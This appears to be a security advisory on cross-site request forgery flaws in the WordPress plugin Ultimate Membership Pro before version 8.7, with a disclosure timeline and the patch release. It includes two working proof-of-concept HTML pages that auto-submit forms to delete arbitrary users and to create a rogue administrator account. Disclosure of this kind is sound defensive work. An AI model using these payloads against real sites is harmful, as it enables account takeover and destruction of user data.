Ultimate Membership Pro < 8.7 – Cross-Site Request Forgery allowing Arbitrary Account Deletion and Creation

Description

While confirming the issues from https://wpvulndb.com/vulnerabilities/10086 have been remediated, two CSRF issues were identified, allowing attackers to make logged in administrator delete arbitrary accounts, as well as create a new administrator account. Other CSRF may be present but haven't been checked.

February 17th, 2020 - Envato Notified
February 22nd, 2020 - New version released (8.7), fixing the reported issues, as well as putting CSRF checks on all other actions as per recommendations.

Proof of Concept

<html>
  <body onload="document.forms[0].submit();">
    <form action="https://examle.com/wp-admin/admin.php?page=ihc_manage&tab=users" method="POST">
      <input type="hidden" name="ihc_limit" value="25" />
      <input type="hidden" name="delete_users[]" value="5" />
      <input type="hidden" name="delete" value="Delete" />
    </form>
  </body>
</html>


<html>
  <!-- Account will not show up in the plugin's users list (because of admin role), but will be in the WP users list -->
 <body onload="document.forms[0].submit();">
    <form action="https://example.com/wp-admin/admin.php?page=ihc_manage&tab=users" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="user_login" value="admin-csrf" />
      <input type="hidden" name="user_email" value="admin-csrf@attacker.com" />
      <input type="hidden" name="first_name" value="Admin" />
      <input type="hidden" name="last_name" value="CSRF" />
      <input type="hidden" name="pass1" value="Passw0rd" />
      <input type="hidden" name="pass2" value="Passw0rd" />
      <input type="hidden" name="role" value="administrator" />
      <input type="hidden" name="ihc_user_levels" value="-1" />
      <input type="hidden" name="ihc_overview_post" value="-1" />
      <input type="hidden" name="Submit" value="Register" />
    </form>
  </body>
</html>